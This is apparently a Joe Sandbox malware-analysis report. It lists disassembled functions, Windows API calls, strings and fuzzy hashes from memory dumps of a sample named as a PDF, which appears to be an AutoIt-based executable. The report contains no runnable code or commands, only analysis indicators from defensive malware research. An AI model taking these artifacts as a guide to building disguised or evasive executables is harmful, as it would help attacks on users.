                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                                          • String ID:
                                                                          • API String ID: 2889604237-0
                                                                          • Opcode ID: 64e4e960941807193e2a4d32d4bb2c56de005708e66fcebfa82327f7720efdcd
                                                                          • Instruction ID: b6539ec16c0addbb4f24641ee44c5a45fa22a89c1565e96ccb77cd38874ad740
                                                                          • Opcode Fuzzy Hash: 64e4e960941807193e2a4d32d4bb2c56de005708e66fcebfa82327f7720efdcd
                                                                          • Instruction Fuzzy Hash: A7E0E5B5800215EFDB019F61E808AAD7BF1FF4C351F108425F95AE72A0CBB88142DF40
                                                                          APIs
                                                                          • GetDesktopWindow.USER32 ref: 00B2219B
                                                                          • GetDC.USER32(00000000), ref: 00B221A5
                                                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00B221B1
                                                                          • ReleaseDC.USER32(?), ref: 00B221D2
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                                          • String ID:
                                                                          • API String ID: 2889604237-0
                                                                          • Opcode ID: f8c7a4aaf6c8d6949149aa8c77ec17225598578ba935ae80973667c85c24399f
                                                                          • Instruction ID: c202ec543e5c8a45960fa228de9be8c94c1115524db7aecdcd6631b303d5c74b
                                                                          • Opcode Fuzzy Hash: f8c7a4aaf6c8d6949149aa8c77ec17225598578ba935ae80973667c85c24399f
                                                                          • Instruction Fuzzy Hash: 98E0E5B5800205AFCB019F61E8086AD7BB1BB4C351F108025F95A972A0CBB89142DF40
                                                                          APIs
                                                                          • OleSetContainedObject.OLE32(?,00000001), ref: 00B3B981
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: ContainedObject
                                                                          • String ID: AutoIt3GUI$Container
                                                                          • API String ID: 3565006973-3941886329
                                                                          • Opcode ID: a4d26f12e671fe9ff8afa8116b2f31cd8bc1d84e64304601b9a3807e0d8db36f
                                                                          • Instruction ID: 0e7a6a1646860f60caead7d8de122ba6a993dfd48ceece76da493eb32b21c17a
                                                                          • Opcode Fuzzy Hash: a4d26f12e671fe9ff8afa8116b2f31cd8bc1d84e64304601b9a3807e0d8db36f
                                                                          • Instruction Fuzzy Hash: 75914C706006019FDB64DF68C884F66BBE9FF48710F2485ADFA49CB695DB70E841CB50
                                                                          APIs
                                                                            • Part of subcall function 00AFFEC6: _wcscpy.LIBCMT ref: 00AFFEE9
                                                                            • Part of subcall function 00AE9997: __itow.LIBCMT ref: 00AE99C2
                                                                            • Part of subcall function 00AE9997: __swprintf.LIBCMT ref: 00AE9A0C
                                                                          • __wcsnicmp.LIBCMT ref: 00B4B298
                                                                          • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00B4B361
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                          • String ID: LPT
                                                                          • API String ID: 3222508074-1350329615
                                                                          • Opcode ID: 0bc9fa6b312ea8421aef66cc1dd1eb656a422401e20f236f793392e5e24f0a21
                                                                          • Instruction ID: bedd92bc4a63c909dbe5f33f5a2317176b076f0c52a01ea8e2cda5db80e5c791
                                                                          • Opcode Fuzzy Hash: 0bc9fa6b312ea8421aef66cc1dd1eb656a422401e20f236f793392e5e24f0a21
                                                                          • Instruction Fuzzy Hash: FA615175A00215AFCB14DF99C985EAEB7F4EF08310F1540AAFA46AB291DB70EE40DB54
                                                                          APIs
                                                                          • Sleep.KERNEL32(00000000), ref: 00AF2AC8
                                                                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 00AF2AE1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: GlobalMemorySleepStatus
                                                                          • String ID: @
                                                                          • API String ID: 2783356886-2766056989
                                                                          • Opcode ID: 922fdfe5e37ad1e4c08fce7d504b4b2388abc231e82c1eae9a4717f44150d183
                                                                          • Instruction ID: 2082879b3d17b2096268a0232eeb0e053c0b79d56db875d79dfdf97c76c6bcf5
                                                                          • Opcode Fuzzy Hash: 922fdfe5e37ad1e4c08fce7d504b4b2388abc231e82c1eae9a4717f44150d183
                                                                          • Instruction Fuzzy Hash: D25149B14187859BD320AF15DD86BAFBBE8FF84310F82485DF1D9521A1DF308929CB16
                                                                          APIs
                                                                            • Part of subcall function 00AE506B: __fread_nolock.LIBCMT ref: 00AE5089
                                                                          • _wcscmp.LIBCMT ref: 00B49AAE
                                                                          • _wcscmp.LIBCMT ref: 00B49AC1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: _wcscmp$__fread_nolock
                                                                          • String ID: FILE
                                                                          • API String ID: 4029003684-3121273764
                                                                          • Opcode ID: 256946da5479d424fe5ba4cab19d12b4088f0c62082dd4a10dd6338433069638
                                                                          • Instruction ID: ddbe1e93ec4ecbc76577c4b40e80adbde957c20130feb9638dd54ff39461483b
                                                                          • Opcode Fuzzy Hash: 256946da5479d424fe5ba4cab19d12b4088f0c62082dd4a10dd6338433069638
                                                                          • Instruction Fuzzy Hash: 3D41F471A00609BEDF219EA1DC86FEFBBFDDF45714F0000B9F900A7181DA75AA0497A1
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 00B52892
                                                                          • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00B528C8
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: CrackInternet_memset
                                                                          • String ID: |
                                                                          • API String ID: 1413715105-2343686810
                                                                          • Opcode ID: 9b4875ba153317725ee296984fe8983d2ac34013e57a0cbc6a206b562c7901ad
                                                                          • Instruction ID: c5f4a409dc829da2c195a203fbf71b3b1b94271aeead000487d0560d3fd6849b
                                                                          • Opcode Fuzzy Hash: 9b4875ba153317725ee296984fe8983d2ac34013e57a0cbc6a206b562c7901ad
                                                                          • Instruction Fuzzy Hash: DA313D71801119AFCF41DFA1DC85EEEBFB9FF19300F1040A9F815A6265DB315A56DBA0
                                                                          APIs
                                                                          • DestroyWindow.USER32(?,?,?,?), ref: 00B66D86
                                                                          • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00B66DC2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Window$DestroyMove
                                                                          • String ID: static
                                                                          • API String ID: 2139405536-2160076837
                                                                          • Opcode ID: f5727f451895d95f42c2d66bf10e373e125b3bc8331b3b47edf04c856f3b2ce3
                                                                          • Instruction ID: e87b91654631e855bd4825c5aa2c2882d4f7fc3323ba5b9d7472c65446517fab
                                                                          • Opcode Fuzzy Hash: f5727f451895d95f42c2d66bf10e373e125b3bc8331b3b47edf04c856f3b2ce3
                                                                          • Instruction Fuzzy Hash: 26317C71210604AADB109F68DC80AFB77F9FF48760F109629F9A697190DA75AC91CB60
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 00B42E00
                                                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00B42E3B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: InfoItemMenu_memset
                                                                          • String ID: 0
                                                                          • API String ID: 2223754486-4108050209
                                                                          • Opcode ID: 07387ae8b52a08a72fb380fcc0c1a723d9dd28da20e56fed05fcec26335248fa
                                                                          • Instruction ID: 9fe83fb8fab37f76b50367cafd4915ab7c2299bbbf1a6cfaec8eff86dc1e98b7
                                                                          • Opcode Fuzzy Hash: 07387ae8b52a08a72fb380fcc0c1a723d9dd28da20e56fed05fcec26335248fa
                                                                          • Instruction Fuzzy Hash: EE31C131A40309ABEB248F58D985BAEBBF9EF05350F5404AAF985971A0E7709B44FB50
                                                                          APIs
                                                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00B669D0
                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B669DB
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend
                                                                          • String ID: Combobox
                                                                          • API String ID: 3850602802-2096851135
                                                                          • Opcode ID: 671cb55c6015d38bfeea34e26626b72b1bbbac11228722a125e78fd1f894bd85
                                                                          • Instruction ID: 7f6fc428091b7a5600a94b3a91c83ff440e011d1c99abd2ba8fda6a3755bea01
                                                                          • Opcode Fuzzy Hash: 671cb55c6015d38bfeea34e26626b72b1bbbac11228722a125e78fd1f894bd85
                                                                          • Instruction Fuzzy Hash: F511C4717002097FEF159F64DC80EBB3BAAEB893A4F110264FD58972E0D6799C518BA0
                                                                          APIs
                                                                            • Part of subcall function 00AE1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00AE1D73
                                                                            • Part of subcall function 00AE1D35: GetStockObject.GDI32(00000011), ref: 00AE1D87
                                                                            • Part of subcall function 00AE1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00AE1D91
                                                                          • GetWindowRect.USER32(00000000,?), ref: 00B66EE0
                                                                          • GetSysColor.USER32(00000012), ref: 00B66EFA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                          • String ID: static
                                                                          • API String ID: 1983116058-2160076837
                                                                          • Opcode ID: aae94415ea6e66fe12c9fba52bac4f5afefc2ba481ffacbf4ecd74d8161678b6
                                                                          • Instruction ID: aadbabd5d6da0e13758371033dba13cd84f5d9250ba778b6bb728e915130f3a5
                                                                          • Opcode Fuzzy Hash: aae94415ea6e66fe12c9fba52bac4f5afefc2ba481ffacbf4ecd74d8161678b6
                                                                          • Instruction Fuzzy Hash: 7A21597261020AAFDB04DFA8DD45AFA7BF8FB08314F004668FD55D3250D679E861DB50
                                                                          APIs
                                                                          • GetWindowTextLengthW.USER32(00000000), ref: 00B66C11
                                                                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00B66C20
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
Similarity
• API ID: LengthMessageSendTextWindow
• String ID: edit
• API String ID: 2978978980-2167791130
• Opcode ID: 895a53f7998769b41c45bacbb7c8f32f664b5db78ef162d5a1edbfc8f7a206e2
• Instruction ID: 570cf79158325f34edfd7529e8b008eef4851eedf3108bf912e1ca2054c251a8
• Opcode Fuzzy Hash: 895a53f7998769b41c45bacbb7c8f32f664b5db78ef162d5a1edbfc8f7a206e2
• Instruction Fuzzy Hash: 11116A71505208ABEB108F64DC82ABA37AAEB15368F244764F961D71E0CA79DC919B60
APIs
• _memset.LIBCMT ref: 00B42F11
• GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00B42F30
Strings
Similarity
• API ID: InfoItemMenu_memset
• String ID: 0
• API String ID: 2223754486-4108050209
• Opcode ID: 273289b46692830742115d01fed412ec55924967f182d360a0348a47ff59a5fc
• Instruction ID: 334fc44396cf795accab6e73ab4fe403e296ff41d6afaab1d27c0a8276e55573
• Opcode Fuzzy Hash: 273289b46692830742115d01fed412ec55924967f182d360a0348a47ff59a5fc
• Instruction Fuzzy Hash: 1C11B672901124ABDF21DB98DC84BAD77F9EB15310F9800E5F855A72A0DBB0AF08F791
APIs
• InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00B52520
• InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00B52549
Strings
Similarity
• API ID: Internet$OpenOption
• String ID: <local>
• API String ID: 942729171-4266983199
• Opcode ID: bbbce9a2b9e3289eee72325cd8b9361daa1bd9d6bc19b3d7c528987c26e54532
• Instruction ID: 79b9d5fdcebce600d659c904d664c863e1c1d2c05d40a5fc0914849051f3f3b0
• Opcode Fuzzy Hash: bbbce9a2b9e3289eee72325cd8b9361daa1bd9d6bc19b3d7c528987c26e54532
• Instruction Fuzzy Hash: 5711E070102225BADB248F519CD9FBBFFE8FB27352F1081EAFE4542140E2706949DAE0
APIs
  • Part of subcall function 00B5830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00B580C8,?,00000000,?,?), ref: 00B58322
• inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00B580CB
• htons.WSOCK32(00000000,?,00000000), ref: 00B58108
Strings
Similarity
• API ID: ByteCharMultiWidehtonsinet_addr
• String ID: 255.255.255.255
• API String ID: 2496851823-2422070025
• Opcode ID: c95d620326fce9beeef0ccf47fea4870421c67ec61aac0df6244c61ce7dcd0e1
• Instruction ID: 4c621c1ea0fea3624a5f0893c0b1e5773da116e8c04bfa468d4f4d041022b28f
• Opcode Fuzzy Hash: c95d620326fce9beeef0ccf47fea4870421c67ec61aac0df6244c61ce7dcd0e1
• Instruction Fuzzy Hash: 3611A135600245ABDB20AF64DC86FBDB3B4FF04321F2085AAFD11A72D1DE72A819C795
APIs
  • Part of subcall function 00AE7F41: _memmove.LIBCMT ref: 00AE7F82
  • Part of subcall function 00B3B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00B3B0E7
• SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00B39355
Strings
Similarity
• API ID: ClassMessageNameSend_memmove
• String ID: ComboBox$ListBox
• API String ID: 372448540-1403004172
• Opcode ID: 45d7a8950943e3c0dc8c20670fe2581b906ba0c40b62501f7b1f8bb3b5a0578e
• Instruction ID: 7e3bcba3b4d17327d6fc52ec1ddae1a39ff5489aec9575d16c514ca43d47a3c1
• Opcode Fuzzy Hash: 45d7a8950943e3c0dc8c20670fe2581b906ba0c40b62501f7b1f8bb3b5a0578e
• Instruction Fuzzy Hash: C501B571A45215ABCB04EB65CC91CFE77A9FF46320F240699F932572D1DB715908C650
APIs
  • Part of subcall function 00AE7F41: _memmove.LIBCMT ref: 00AE7F82
  • Part of subcall function 00B3B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00B3B0E7
• SendMessageW.USER32(?,00000180,00000000,?), ref: 00B3924D
Strings
Similarity
• API ID: ClassMessageNameSend_memmove
• String ID: ComboBox$ListBox
• API String ID: 372448540-1403004172
• Opcode ID: 51f1451a22bb063f7752847d33a10ea4974e2830ac1613b7bdd9da58f4792bae
• Instruction ID: 1f5c117b689f76b41f67fb583360d695de1d62f36a8d25890bd9cd0c57d3285c
• Opcode Fuzzy Hash: 51f1451a22bb063f7752847d33a10ea4974e2830ac1613b7bdd9da58f4792bae
• Instruction Fuzzy Hash: ED018F71A412087BCB08EBA4CD96EFFB3E8DF55340F2400A9B91267291EA556E0C96B1
APIs
  • Part of subcall function 00AE7F41: _memmove.LIBCMT ref: 00AE7F82
  • Part of subcall function 00B3B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00B3B0E7
• SendMessageW.USER32(?,00000182,?,00000000), ref: 00B392D0
Strings
Similarity
• API ID: ClassMessageNameSend_memmove
• String ID: ComboBox$ListBox
• API String ID: 372448540-1403004172
• Opcode ID: 5f780119ab55aab135ec68b21f7cc95dbc125a32cc33387c3d3145df91961099
• Instruction ID: 96cc6b11af0780454d8571619ba5fffc2e3076f0a4e7e0d0303a09751626b0b9
• Opcode Fuzzy Hash: 5f780119ab55aab135ec68b21f7cc95dbc125a32cc33387c3d3145df91961099
• Instruction Fuzzy Hash: 5E01A271A4120877CF04EAA4CD82EFF77EC9F15340F2401A9B91267292DA615E0C9671
APIs
Strings
Similarity
• API ID: ClassName_wcscmp
• String ID: #32770
• API String ID: 2292705959-463685578
• Opcode ID: e57923a28512d69b57fdd99977d6b00f60d979643c794481b5b7b1f448591503
• Instruction ID: e492041353e4fdbba2a464c05348b55abf9f9247d518ef7037518ec6cf8ef9f2
• Opcode Fuzzy Hash: e57923a28512d69b57fdd99977d6b00f60d979643c794481b5b7b1f448591503
• Instruction Fuzzy Hash: 9CE0D17390422D27D7209B95AC49FA7F7ECEB55B71F0001A7FD14D3051D9609E4587E1
APIs
• MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00B381CA
  • Part of subcall function 00B03598: _doexit.LIBCMT ref: 00B035A2
Strings
Similarity
• API ID: Message_doexit
• String ID: AutoIt$Error allocating memory.
• API String ID: 1993061046-4017498283
• Opcode ID: a0569d8aecebfa061c4070b858c303c3e9f1bf475da1c7f1e0e2d697e8aef96f
• Instruction ID: 7d8c7fa156a02f907410adc4325da2c0bef817c5162615d7fc485980dfae809f
• Opcode Fuzzy Hash: a0569d8aecebfa061c4070b858c303c3e9f1bf475da1c7f1e0e2d697e8aef96f
• Instruction Fuzzy Hash: E8D02B323C431832D21532FD6D0BFC539CC8B09F51F0044A6FB48551E38DD5488142ED
APIs
  • Part of subcall function 00B1B564: _memset.LIBCMT ref: 00B1B571
  • Part of subcall function 00B00B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00B1B540,?,?,?,00AE100A), ref: 00B00B89
• IsDebuggerPresent.KERNEL32(?,?,?,00AE100A), ref: 00B1B544
• OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00AE100A), ref: 00B1B553
Strings
• ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00B1B54E
Similarity
• API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
• String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
• API String ID: 3158253471-631824599
• Opcode ID: 96adb746af73d0b8a2eb18eecec5b122b3fc9eb2359d956c44fad6ec30538e79
• Instruction ID: eeb4c698504525d8501b881fc3eee881b90a41a0d6df7b6da5c541e3e16300e9
• Opcode Fuzzy Hash: 96adb746af73d0b8a2eb18eecec5b122b3fc9eb2359d956c44fad6ec30538e79
• Instruction Fuzzy Hash: 69E06DB16103528BD720EF28E414B827BE0EB14705F0489ACE446C36A0DBB8D484CBA1
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B65BF5
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00B65C08
  • Part of subcall function 00B454E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00B4555E
Strings
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: a1e60799c2aa156950cb52674a4f56d1717c764798da19ce13e87465eaaf32d4
• Instruction ID: e0f7930928e1317cba0b2b025edc9d1eb614a62f879d42a09bcf58b791131a06
• Opcode Fuzzy Hash: a1e60799c2aa156950cb52674a4f56d1717c764798da19ce13e87465eaaf32d4
• Instruction Fuzzy Hash: A7D0A931388312B7E774AB30BC0BFA32A50AB00B00F000835B306AA1E1CCE85800C240